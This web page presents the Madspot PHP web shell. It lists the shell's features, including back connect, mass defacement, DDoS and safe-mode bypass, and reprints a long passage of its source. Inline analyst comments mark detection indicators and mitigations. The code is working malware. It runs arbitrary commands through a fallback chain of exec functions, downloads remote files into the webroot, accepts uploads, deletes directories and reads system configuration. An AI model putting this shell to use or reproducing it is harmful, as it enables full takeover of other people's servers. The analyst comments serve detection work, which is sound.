
Madspot shell script

31 Mar 2014

Madspot shell script, from the Madspot Security Team (madspot.net) — or was the author Ikram Ali, as the script's own header says? The Madspot Security Team website can be found at pcbots.org.

The Madspot shell is written in PHP, runs on both Linux and Windows servers, and provides the following features:

  • Process List
  • Eval
  • SQL Command Panel
  • Hash Generation
  • Perl and PHP Back Connect
  • Zone-h mass defacer
  • Powerful DDOS tool from server
  • Auto Safe mode Off (priv8)
  • Whole Server Auto Symlink (Priva8 Coded)
  • Perl 500 Internal Error Bypass
  • Killcode (Delete Shell)

Madspot shell source code

   1 <?php
   2 
   3     /**
   4      * @author Ikram ALI
   5      * @copyright 2012
   6      */
         // Analyst note: the entry sequence below removes every limit and trace
         // PHP would normally leave -- notices are dropped, error_log is nulled,
         // log_errors is switched off and the execution time limit is removed.
         // A webroot script that does this on entry is a strong web-shell
         // indicator for file-content scanning; the server-side controls the
         // rest of the file keeps probing (disable_functions, open_basedir,
         // safe_mode, a read-only webroot) are the corresponding mitigations.
   7     @define('VERSION','1.0');
   8     @error_reporting(E_ALL ^ E_NOTICE);
   9     @session_start();
  10     @ini_set('error_log',NULL);
  11     @ini_set('log_errors',0);
  12     @ini_set('max_execution_time',0);
  13     @set_time_limit(0);
  14     @set_magic_quotes_runtime(0);
  15 
         // Undo magic_quotes on $_POST only (GET/COOKIE are left as-is), so the
         // request parameters reach the handlers below unescaped.
  16     if(get_magic_quotes_gpc()) {
  17             function madstripslashes($array) {
  18                     return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
  19             }
  20             $_POST = madstripslashes($_POST);
  21     }
         // Defaults: the entry action is the file manager. $default_use_ajax is
         // assigned here but not referenced anywhere in this excerpt.
  22     $default_action = 'FilesMan';
  23     $default_use_ajax = true;
  24     $default_charset = 'Windows-1251';
  25     if (strtolower(substr(PHP_OS,0,3))=="win")
  26         $sys='win';
  27      else
  28         $sys='unix';
  29 
         // The working directory is taken straight from POST 'c' with no
         // validation; every later relative path operation happens inside it.
         // Because it travels in the POST body it is invisible in standard
         // access logs -- request-body logging or a WAF is needed to see it.
  30     $home_cwd = @getcwd();
  31     if(isset($_POST['c']))
  32             @chdir($_POST['c']);  
  33 
  34     $cwd = @getcwd();
  35     if($sys == 'win')
  36     {
  37         $home_cwd = str_replace("\\", "/", $home_cwd);
  38             $cwd = str_replace("\\", "/", $cwd);
  39     }
  40 
         // Normalise to a trailing slash so the later "$cwd . $name" joins work.
  41     if($cwd[strlen($cwd)-1] != '/' )
  42             $cwd .= '/';
  43 
  44 
  45     function madEx($in) {
                 // Run the command string $in through whichever execution primitive
                 // is still available, trying in order: exec, passthru, system,
                 // shell_exec, popen. Returns the captured output, or '' when none
                 // of the five exists. Errors are suppressed throughout.
                 //
                 // Mitigation note: the fallback chain exists to defeat a partial
                 // disable_functions list -- all five names have to be disabled
                 // together for that control to hold against this code.
  46             $out = '';
  47             if (function_exists('exec')) {
  48                     @exec($in,$out);
                         // exec() fills $out with an array of lines; flatten it.
  49                     $out = @join("\n",$out);
  50             } elseif (function_exists('passthru')) {
                         // passthru()/system() print directly, so capture them with
                         // an output buffer.
  51                     ob_start();
  52                     @passthru($in);
  53                     $out = ob_get_clean();
  54             } elseif (function_exists('system')) {
  55                     ob_start();
  56                     @system($in);
  57                     $out = ob_get_clean();
  58             } elseif (function_exists('shell_exec')) {
  59                     $out = shell_exec($in);
  60             } elseif (is_resource($f = @popen($in,"r"))) {
                         // Last resort: read the process pipe in 1 KiB chunks.
  61                     $out = "";
  62                     while(!@feof($f))
  63                             $out .= fread($f,1024);
  64                     pclose($f);
  65             }
  66             return $out;
  67     }
  68     $down=@getcwd();
         // Remote-fetch handler for the footer's "HTTP DOWNLOAD" form: the value
         // of POST 'rtdown' is opened with fopen() (a URL open that
         // allow_url_fopen=Off would block) and copied into the current
         // directory under its basename. The observable pattern is an outbound
         // HTTP connection from the web server process followed by a new file
         // appearing in the webroot.
         // NOTE: $newf is only assigned inside "if ($file)"; when the remote
         // open fails the later "if ($newf)" reads it unassigned (the notice is
         // suppressed by the error_reporting setting at the top of the file).
  69     if($sys=="win")
  70     $down.='\\';
  71     else
  72     $down.='/';
  73     if(isset($_POST['rtdown']))
  74     {
  75     $url = $_POST['rtdown'];
  76     $newfname = $down. basename($url);
  77     $file = fopen ($url, "rb");
  78     if ($file) {
  79       $newf = fopen ($newfname, "wb");
  80       if ($newf)
  81       while(!feof($file)) {
  82         fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
  83       }
  84       }
  85 
  86     if ($file) {
  87       fclose($file);
  88     }
  89     if ($newf) {
  90       fclose($newf);
  91     }
  92     }
  93 
  94 
  95 
  96      function madhead()
  97      {
         // Emit the page head and the environment summary. In order: CSS, a
         // hidden POST form plus the JS helpers set()/g() that every menu link
         // and footer form drives, then a table of host facts (uname, effective
         // user/group, PHP version and safe_mode, server/client IP, a domain
         // count from /etc/named.conf, disk usage, which toolchain/downloader
         // binaries are on PATH, disable_functions, DB extension presence,
         // open_basedir and safe_mode dirs, drive letters on Windows, a cwd
         // breadcrumb) and the action menu. Reads $GLOBALS['cwd'], 'home_cwd',
         // 'sys', 'default_charset' and $_POST; all output is echoed.
  98         if(empty($_POST['charset']))
  99                     $_POST['charset'] = $GLOBALS['default_charset'];
 100 
         // Guard against a zero total so the percentage below cannot divide by 0.
 101     $freeSpace = @diskfreespace($GLOBALS['cwd']);
 102     $totalSpace = @disk_total_space($GLOBALS['cwd']);
 103     $totalSpace = $totalSpace?$totalSpace:1;
 104 
         // Capability probes: each flag is function_exists() only, i.e. the
         // extension is loaded -- not that any connection would succeed.
 105     $on="<font color=#0F0> ON </font>";
 106     $of="<font color=red> OFF </font>";
 107     $none="<font color=#0F0> NONE </font>";  
 108     if(function_exists('curl_version'))
 109         $curl=$on;
 110     else
 111         $curl=$of;
 112     if(function_exists('mysql_get_client_info'))
 113         $mysql=$on;
 114      else
 115         $mysql=$of;
 116     if(function_exists('mssql_connect'))
 117         $mssql=$on;
 118     else
 119        $mssql=$of;
 120 
 121     if(function_exists('pg_connect'))
 122         $pg=$on;
 123     else
 124        $pg=$of;
 125     if(function_exists('oci_connect'))
 126        $or=$on;
 127     else
 128        $or=$of;
         // The hardening posture is read back and displayed verbatim:
         // disable_functions, safe_mode, open_basedir and the safe_mode dirs.
 129     if(@ini_get('disable_functions'))
 130       $disfun=@ini_get('disable_functions');
 131     else
 132     $disfun="All Functions Enable";
 133     if(@ini_get('safe_mode'))
 134     $safe_modes="<font color=red>ON</font>";
 135     else
 136     $safe_modes="<font color=#0F0 >OFF</font>";
 137     if(@ini_get('open_basedir'))
 138     $open_b=@ini_get('open_basedir');
 139         else
 140       $open_b=$none;
 141 
 142 
 143     if(@ini_get('safe_mode_exec_dir'))
 144     $safe_exe=@ini_get('safe_mode_exec_dir');
 145         else
 146     $safe_exe=$none;
 147     if(@ini_get('safe_mode_include_dir'))
 148        $safe_include=@ini_get('safe_mode_include_dir');
 149     else
 150      $safe_include=$none;
         // Effective user/group: via the posix extension when present, else the
         // script owner from getmyuid()/getmygid() with the group left as "?".
 151     if(!function_exists('posix_getegid'))
 152     {
 153                     $user = @get_current_user();
 154                     $uid = @getmyuid();
 155                     $gid = @getmygid();
 156                     $group = "?";
 157     } else
 158     {
 159                     $uid = @posix_getpwuid(posix_geteuid());
 160                     $gid = @posix_getgrgid(posix_getegid());
 161                     $user = $uid['name'];
 162                     $uid = $uid['uid'];
 163                     $group = $gid['name'];
 164                     $gid = $gid['gid'];
 165             }
 166 
 167 
         // Breadcrumb: one link per path component of cwd, each navigating the
         // file manager to the prefix ending at that component.
 168          $cwd_links = '';
 169             $path = explode("/", $GLOBALS['cwd']);
 170             $n=count($path);
 171             for($i=0; $i<$n-1; $i++) {
 172                     $cwd_links .= "<a  href='#' onclick='g(\"FilesMan\",\"";
 173                     for($j=0; $j<=$i; $j++)
 174                             $cwd_links .= $path[$j].'/';
 175                     $cwd_links .= "\")'>".$path[$i]."/</a>";
 176             }
 177 
         // Drive discovery: is_dir() on every letter c: .. z: (only rendered
         // later when $sys is 'win', but the probes run on every platform).
 178     $drives = "";
 179     foreach(range('c','z') as $drive)
 180     if(is_dir($drive.':\\'))
 181     $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
 182 
 183 
 184 
 185 
 186 
         // Static markup and stylesheet. The favicon is pulled from madspot.net,
         // so a page load makes the client fetch that host -- an outbound
         // indicator on the operator side, not the server side.
 187      echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 188     <html xmlns="http://www.w3.org/1999/xhtml">
 189     <head>
 190     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 191     <link href="http://www.madspot.net/favicon.ico" rel="icon" type="image/x-icon"/>
 192     <title>Madspot Security Team Shell</title>
 193     <style type="text/css">
 194     <!--
 195     .whole {
 196             background-color: #CCC;
 197             height:auto;
 198             width: auto;
 199             margin-top: 10px;
 200             margin-right: 10px;
 201             margin-left: 10px;
 202     }
 203     .header {
 204             height: auto;
 205             width: auto;
 206             border: 7px solid #CCC;
 207             color: #999;
 208             font-size: 12px;
 209             font-family: Verdana, Geneva, sans-serif;
 210             background-color: #000;
 211     }
 212     .header a {color:#0F0; text-decoration:none;}
 213     span {
 214             font-weight: bolder;
 215             color: #FFF;
 216     }
 217     #meunlist {
 218             font-family: Verdana, Geneva, sans-serif;
 219             color: #FFF;
 220             background-color: #000;
 221             width: auto;
 222             border-right-width: 7px;
 223             border-left-width: 7px;
 224             border-top-style: solid;
 225             border-right-style: solid;
 226             border-bottom-style: solid;
 227             border-left-style: solid;
 228             border-top-color: #CCC;
 229             border-right-color: #CCC;
 230             border-bottom-color: #CCC;
 231             border-left-color: #CCC;
 232             height: auto;
 233             font-size: 12px;
 234             font-weight: bold;
 235             border-top-width: 0px;
 236     }
 237      .whole #meunlist ul {
 238             padding-top: 5px;
 239             padding-right: 5px;
 240             padding-bottom: 7px;
 241             padding-left: 2px;
 242             text-align:center;
 243             list-style-type: none;
 244             margin: 0px;
 245     }
 246      .whole #meunlist li {
 247             margin: 0px;
 248             padding: 0px;
 249             display: inline;
 250     }
 251      .whole #meunlist a {
 252        font-family: arial, sans-serif;
 253             font-size: 14px;
 254             text-decoration:none;
 255             font-weight: bold;
 256             color: #fff;
 257             clear: both;
 258             width: 100px;
 259             margin-right: -6px;
 260             padding-top: 3px;
 261             padding-right: 15px;
 262             padding-bottom: 3px;
 263             padding-left: 15px;
 264             border-right-width: 1px;
 265             border-right-style: solid;
 266             border-right-color: #FFF;
 267     }
 268      .whole #meunlist a:hover {
 269             color: #000;
 270             background: #fff;
 271     }
 272 
 273     .foot {
 274             font-family: Verdana, Geneva, sans-serif;
 275             background-color: #000;
 276             margin: 0px;
 277             padding: 0px;
 278             width: 100%;
 279             text-align: center;
 280             font-size: 12px;
 281             color: #CCC;
 282             border-right-width: 7px;
 283             border-left-width: 7px;
 284        border-bottom-width: 7px;
 285        border-bottom-style: solid;
 286        border-right-style: solid;
 287        border-right-style: solid;
 288             border-left-style: solid;
 289             border-top-color: #CCC;
 290             border-right-color: #CCC;
 291             border-bottom-color: #CCC;
 292             border-left-color: #CCC;
 293     }';
         // The footer inputs turn red when cwd is not writable -- a visual
         // writability probe of the current directory.
 294     if(is_writable($GLOBALS['cwd']))
 295      {
 296         echo ".foottable {
 297        width: 300px;
 298        font-weight: bold;
 299        }";}
 300         else
 301         {
 302            echo ".foottable {
 303        width: 300px;
 304        font-weight: bold;
 305        background-color:red;
 306        }
 307        .dir {
 308          background-color:red;  
 309        }
 310        ";
 311         }
 312      echo '.main th{text-align:left;}
 313     .main a{color: #FFF;}
 314     .main tr:hover{background-color:red;}
 315     .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
 316     .bigarea{ width:99%; height:300px; }  
 317      </style>
 318 
 319     ';
 320 
         // Navigation JS. The hidden form 'mf' is the only navigation
         // mechanism: every link calls g(), which fills a/c/p1/p2/p3/charset
         // (falling back to the values echoed from the current request) and
         // submits by POST. The page never uses GET, so a request-body rule
         // matching that exact parameter set is a practical detection for this
         // family. p1..p3 are only reflected when they contain no newline.
 321     echo "<script>
 322        var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
 323        var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
 324        var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
 325        var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
 326        var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
 327        var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
 328        var d = document;
 329             function set(a,c,p1,p2,p3,charset) {
 330                     if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
 331                     if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
 332                     if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
 333                     if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
 334                     if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
 335                     if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
 336             }
 337             function g(a,c,p1,p2,p3,charset) {
 338                     set(a,c,p1,p2,p3,charset);
 339                     d.mf.submit();
 340             }</script>";
 341 
 342 
         // Host summary table. "Our IP"/"Server IP" labels are swapped relative
         // to the values: SERVER_ADDR is the server, REMOTE_ADDR the requester.
 343             echo '
 344     </head>
 345 
 346     <body bgcolor="#000000"  leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
 347     <div class="whole">
 348     <form method=post name=mf style="display:none;">
 349     <input type=hidden name=a>
 350     <input type=hidden name=c>
 351     <input type=hidden name=p1>
 352     <input type=hidden name=p2>
 353     <input type=hidden name=p3>
 354     <input type=hidden name=charset>
 355     </form>
 356      <div class="header"><table width="100%" border="0"  align="lift">
 357      <tr>
 358        <td width="3%"><span>Uname:</span></td>
 359        <td colspan="2">'.substr(@php_uname(), 0, 120).'</td>
 360        </tr>
 361      <tr>
 362        <td><span>User:</span></td>
 363        <td>'. $uid . ' [ ' . $user . ' ] <span>   Group: </span>' . $gid . ' [ ' . $group . ' ] </td>
 364        <td width="14%" rowspan="8"><img alt="" src="" /></td>
 365      </tr>
 366      <tr>
 367        <td><span>PHP:</span></td>
 368        <td>'.@phpversion(). '   <span>   Safe Mode:'.$safe_modes.'</span></td>
 369        </tr>
 370      <tr>
 371        <td><span>Our IP:</span></td>
 372        <td>'.@$_SERVER["SERVER_ADDR"].'    <span>Server IP:</span> '.@$_SERVER["REMOTE_ADDR"].'</td>
 373      </tr>
 374      <tr>
 375        <td><span>WEBS:</span></td>
 376        <td width="76%">';
 377 
         // Counts 'zone' entries in /etc/named.conf as a proxy for the number of
         // hosted domains -- a read of a system config file by the web server
         // user. "$count;" on the line marked 387 is a no-op, and ereg() no
         // longer exists in PHP 7+, so this branch fails there.
 378         if($GLOBALS['sys']=='unix')
 379         {
 380             $d0mains = @file("/etc/named.conf");
 381             if(!$d0mains)
 382             {
 383                 echo "CANT READ named.conf";
 384             }
 385             else
 386             {
 387               $count;  
 388              foreach($d0mains as $d0main)
 389              {
 390               if(@ereg("zone",$d0main))
 391               {
 392               preg_match_all('#zone "(.*)"#', $d0main, $domains);
 393                flush();
 394               if(strlen(trim($domains[1][0])) > 2){
 395              flush();
 396              $count++;
 397                }
 398                }
 399                }
 400                echo "$count  Domains";
 401             }
 402         }
 403         else{ echo"CANT READ |Windows|";}
 404 
 405           echo '</td>
 406        </tr>
 407        <tr>
 408        <td height="16"><span>HDD:</span></td>
 409        <td>'.madSize($totalSpace).' <span>Free:</span>' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</td>
 410        </tr>';
 411 
         // Toolchain/downloader inventory. Each madWhich() call is a separate
         // `which` child process, so merely loading this page spawns 23
         // processes (16 + 7 names) from the web server -- a clear signal for
         // execve auditing with the web server as parent. Skipped under
         // safe_mode; on Windows a single `ver` is run instead.
 412          if($GLOBALS['sys']=='unix' )
 413     {
 414         if(!@ini_get('safe_mode'))
 415         {
 416 
 417         echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
 418         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 419          foreach($userful as $item)
 420              if(madWhich($item))
 421              echo $item.',';
 422              echo '</td>
 423             </tr>
 424              <tr>
 425              <td height="0" colspan="2"><span>Downloader:</span>';
 426 
 427          $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 428           foreach($downloaders as $item2)
 429            if(madWhich($item2))
 430             echo $item2.',';
 431             echo '</td>
 432                  </tr>';
 433 
 434               }
 435                else
 436                {
 437              echo '<tr><td height="18" colspan="2"><span>useful:</span>';
 438              echo '--------------</td>
 439               </tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 440                  </tr>';  
 441              }
 442     }
 443     else
 444     {
 445        echo '<tr><td height="18" colspan="2"><span>Window:</span>';
 446        echo madEx('ver');
 447        echo '</td>
 448             </tr> <tr>
 449            <td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 450                  </tr>';
 451 
 452     }  
 453 
 454 
         // The base64 blob appears to decode to a plain HTML anchor pointing at
         // madspot.net (the team's site) -- branding, not logic, but the
         // encoded string itself is a convenient file-content signature.
 455      echo '<tr>
 456        <td height="16" colspan="2"><span>Disabled functions:</span>'.$disfun.'</td>
 457      </tr>
 458      <tr>
 459        <td height="16" colspan="2"><span>cURL:'.$curl.'  MySQL:'.$mysql.'  MSSQL:'.$mssql.'  PostgreSQL:'.$pg.'  Oracle: </span>'.$or.'</td><td width="15%">'.base64_decode("PGEgaHJlZj0iaHR0cDovL3d3dy5tYWRzcG90Lm5ldCIgdGFyZ2V0PSJfYmxhbmsiPjxzcGFuPjxmb250IGNvbG9yPSIjMEYwIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtNQURTUE9ULk5FVDwvZm9udD48L3NwYW4+PC9hPg==").'</td>
 460      </tr>
 461      <tr>
 462      <td height="11" colspan="3"><span>Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.'   Safe_mode_include_dir:'.$safe_include.'</td>
 463      </tr>
 464      <tr>
 465        <td height="11"><span>Server </span></td>
 466        <td colspan="2">'.@getenv('SERVER_SOFTWARE').'</td>
 467      </tr>';
         // $GLOBALS[sys] uses a bareword key; PHP treats the undefined constant
         // as the string 'sys' (with a notice, suppressed here), so it works.
 468       if($GLOBALS[sys]=="win")
 469       {
 470         echo '<tr>
 471        <td height="12"><span>DRIVE:</span></td>
 472        <td colspan="2">'.$drives.'</td>
 473         </tr>';
 474       }
 475 
         // Action menu. The first argument of each g() call is the action name
         // posted in 'a'; of these, only the FilesMan handler (madFilesMan) and
         // the FilesTools handler are within this excerpt.
 476       echo '<tr>
 477        <td height="12"><span>PWD:</span></td>
 478        <td colspan="2">'.$cwd_links.'  <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >|CURRENT|</font></a></td>
 479      </tr>
 480      </table>
 481     </div>
 482     <div id="meunlist">
 483          <ul>
 484     <li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
 485 
 486     <li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">PROCESS</a></li>
 487     <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
 488     <li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
 489     <li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
 490     <li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">CONNECT</a></li>
 491     <li><a href="#" onclick="g(\'zoneh\',null,\'\',\'\',\'\')">ZONE-H</a></li>
 492     <li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
 493     <li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
 494     <li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
 495     <li><a href="#" onclick="g(\'spot\',null,\'\',\'\',\'\')">MADSPOT</a></li>
 496     <li><a href="#" onclick="g(\'selfrm\',null,\'\',\'\',\'\')">KIll C0de</a></li>
 497     </ul>
 498 
 499        </div>
 500     ';  
 501 
 502     }
 503 
 504     function madfooter()
 505     {
         // Emit the footer tool strip and close the page. The forms map to:
         // mkfile/chmod -> FilesTools with the name in p1 and the verb in p2;
         // mkdir/delete -> FilesMan with the verb in p1 and the name in p2;
         // change dir -> only 'c' changes; HTTP download -> posts 'rtdown'
         // (handled at the top of the file); execute -> action 'proc' with the
         // command text in p1; and a multipart upload posting a=FilesMAn,
         // p1=uploadFile with the file in field 'f' (handled by the uploadFile
         // case in madFilesMan -- note the 'FilesMAn' casing differs from the
         // menu's 'FilesMan'; the dispatcher that resolves it is outside this
         // excerpt). Reads $GLOBALS['cwd'] and $_POST['charset'].
 506 
 507         echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
 508           <tr>
 509             <td width='17%'><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>__MK FILE__</span><br><input class='dir'  type=text name=f value=''><input type=submit value='>>'></form></td>
 510             <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>__MK DIR__</span><br><input class='dir' type=text name=d value=''><input type=submit value='>>'></form></td>
 511             <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);return false;\"><span>__DELETE__</span><br><input class='dir' type=text name=del value=''><input type=submit value='>>'></form></td>
 512             <td width='19%'><form onsubmit=\"g('FilesTools',null,this.f.value,'chmod');return false;\"><span>__CHMOD__</span><br><input class='dir' type=text name=f value=''><input type=submit value='>>'></form></td>
 513           </tr>
 514           <tr>
 515             <td colspan='2'><form onsubmit='g(null,this.c.value,\"\");return false;'><span>__CHANGE DIR__</span><br><input class='foottable' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=submit value='>>'></form></td>
 516             <td colspan='2'><form method='post' ><span>__HTTP DOWNLOAD__</span><br><input class='foottable' type=text name=rtdown value=''><input type=submit value='>>'></form></td>
 517            </tr>
 518           <tr>
 519             <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);return false;\"><span>__EXECUTE__</span><br><input class='foottable' type=text name=c value=''><input type=submit value='>>'></form></td>
 520            </tr>
 521           <tr>
 522             <td colspan='4'><form method='post' ENCTYPE='multipart/form-data'>
 523                     <input type=hidden name=a value='FilesMAn'>
 524                     <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
 525                     <input type=hidden name=p1 value='uploadFile'>
 526                     <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
 527            <span>Upload file:</span><br><input class='toolsInp' type=file name=f><br /><input type=submit value='>>'></form></td>
 528            </tr>
 529          </table>
 530      </div>
 531      </body>
 532     </html>
 533     ";
 534 
 535     }
 536     if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
         // Stubs returning false when the posix extension is absent. The
         // disable_functions check matters: a disabled function still exists
         // as a name, and redeclaring it would be a fatal error.
 537        function posix_getpwuid($p) {return false;} }
 538     if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
 539       function posix_getgrgid($p) {return false;} }
 540 
 541     function madWhich($p) {
                 // Locate binary $p by running `which` through madEx(); returns the
                 // command output (the path) or false when it is empty. Every call
                 // is a shell execution, and $p is interpolated unquoted -- here it
                 // is only ever fed the hard-coded names from madhead().
 542             $path = madEx('which ' . $p);
 543             if(!empty($path))
 544                     return $path;
 545             return false;
 546     }
 547 
 548 
 549 
 550     function madSize($s) {
                 // Format a byte count as GB/MB/KB with two decimals, or raw bytes
                 // below 1024. Binary (1024-based) units.
 551             if($s >= 1073741824)
 552                     return sprintf('%1.2f', $s / 1073741824 ). ' GB';
 553             elseif($s >= 1048576)
 554                     return sprintf('%1.2f', $s / 1048576 ) . ' MB';
 555             elseif($s >= 1024)
 556                     return sprintf('%1.2f', $s / 1024 ) . ' KB';
 557             else
 558                     return $s . ' B';
 559     }
 560 
 561 
 562     function madPerms($p) {
                 // Render a fileperms() mode as an ls-style string. The type letter
                 // comes from the S_IFMT bits (socket, symlink, regular, block,
                 // dir, char, fifo; 'u' for anything else), then three rwx triads
                 // with setuid/setgid shown as s/S and the sticky bit as t/T.
 563             if (($p & 0xC000) == 0xC000)$i = 's';
 564             elseif (($p & 0xA000) == 0xA000)$i = 'l';
 565             elseif (($p & 0x8000) == 0x8000)$i = '-';
 566             elseif (($p & 0x6000) == 0x6000)$i = 'b';
 567             elseif (($p & 0x4000) == 0x4000)$i = 'd';
 568             elseif (($p & 0x2000) == 0x2000)$i = 'c';
 569             elseif (($p & 0x1000) == 0x1000)$i = 'p';
 570             else $i = 'u';
                 // Owner triad; 0x0800 is setuid.
 571             $i .= (($p & 0x0100) ? 'r' : '-');
 572             $i .= (($p & 0x0080) ? 'w' : '-');
 573             $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
                 // Group triad; 0x0400 is setgid.
 574             $i .= (($p & 0x0020) ? 'r' : '-');
 575             $i .= (($p & 0x0010) ? 'w' : '-');
 576             $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
                 // Other triad; 0x0200 is the sticky bit.
 577             $i .= (($p & 0x0004) ? 'r' : '-');
 578             $i .= (($p & 0x0002) ? 'w' : '-');
 579             $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
 580             return $i;
 581     }
 582     function madPermsColor($f) {
                 // Wrap madPerms() output in a colour that reflects what the web
                 // server user can do with $f: red = not readable, white = readable
                 // but not writable, green = writable. fileperms() failures are
                 // suppressed and render as mode 0.
 583             if (!@is_readable($f))
 584                     return '<font color=#FF0000>' . madPerms(@fileperms($f)) . '</font>';
 585             elseif (!@is_writable($f))
 586                     return '<font color=white>' . madPerms(@fileperms($f)) . '</font>';
 587             else
 588                     return '<font color=#25ff00>' . madPerms(@fileperms($f)) . '</font>';
 589     }
 590 
 591     if(!function_exists("scandir")) {
                 // Polyfill for very old PHP without scandir(). Differences from the
                 // builtin: entries are not sorted, the handle is never closed, an
                 // opendir() failure falls through to readdir(false), and $files is
                 // unassigned (so null is returned) when the directory is empty.
 592             function scandir($dir) {
 593                     $dh  = opendir($dir);
 594                     while (false !== ($filename = readdir($dh)))
 595                     $files[] = $filename;
 596                     return $files;
 597             }
 598     }
 599 
 600 
 601     function madFilesMan() {
                 // The 'FilesMan' action: a directory listing with inline actions.
                 // First dispatches on POST p1 (uploadFile, mkdir, delete, else a
                 // sort spec or a bulk-action selection stored in the session),
                 // then lists the directory from POST 'c' (default cwd), sorts it
                 // and renders one row per entry with view/chmod/rename/touch/
                 // edit/download/delete links. Emits the full page via madhead()
                 // and madfooter(). The wsoCmp helper name suggests this section
                 // was lifted from the WSO shell.
 602             madhead();
 603         echo '<div class=header><script>p1_=p2_=p3_="";</script>';
 604             if(!empty($_POST['p1'])) {
 605                     switch($_POST['p1']) {
                                 // Upload lands in cwd under the client-supplied name,
                                 // unsanitised -- new files in the webroot whose name
                                 // came from a multipart POST are the trace to look for.
 606                             case 'uploadFile':
 607                                     if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
 608                                             echo "Can't upload file!";
 609                                     break;
 610                             case 'mkdir':
 611                                     if(!@mkdir($_POST['p2']))
 612                                             echo "Can't create new dir";
 613                                     break;
 614                             case 'delete':
                                         // deleteDir is declared inside the case, so it only
                                         // exists once a delete request runs (one request per
                                         // process, so the conditional declaration is safe).
                                         // Recursive removal; symlinked directories are
                                         // reported as "link" by filetype() and are unlinked,
                                         // not descended into.
 615                                     function deleteDir($path) {
 616                                             $path = (substr($path,-1)=='/') ? $path:$path.'/';
 617                                             $dh  = opendir($path);
 618                                             while ( ($item = readdir($dh) ) !== false) {
 619                                                     $item = $path.$item;
 620                                                     if ( (basename($item) == "..") || (basename($item) == ".") )
 621                                                             continue;
 622                                                     $type = filetype($item);
 623                                                     if ($type == "dir")
 624                                                             deleteDir($item);
 625                                                     else
 626                                                             @unlink($item);
 627                                             }
 628                                             closedir($dh);
 629                                             @rmdir($path);
 630                                     }
 631                                     if(is_dir(@$_POST['p2']))
 632                                     deleteDir(@$_POST['p2']);
 633                                     else
 634                                     @unlink(@$_POST['p2']);
 635                                     break;
                         // Any other p1 is remembered in the session together with the
                         // posted 'f' list and 'c'; presumably a multi-file action
                         // consumed by a handler outside this excerpt -- confirm.
 636                     default:
 637                     if(!empty($_POST['p1'])) {
 638                                             $_SESSION['act'] = @$_POST['p1'];
 639                                             $_SESSION['f'] = @$_POST['f'];
 640                                             foreach($_SESSION['f'] as $k => $f)
 641                                                     $_SESSION['f'][$k] = urldecode($f);
 642                                             $_SESSION['c'] = @$_POST['c'];
 643                                     }
 644                                     break;
 645                     }
 646             }
                 // madFooter() resolves to madfooter(): PHP function names are
                 // case-insensitive.
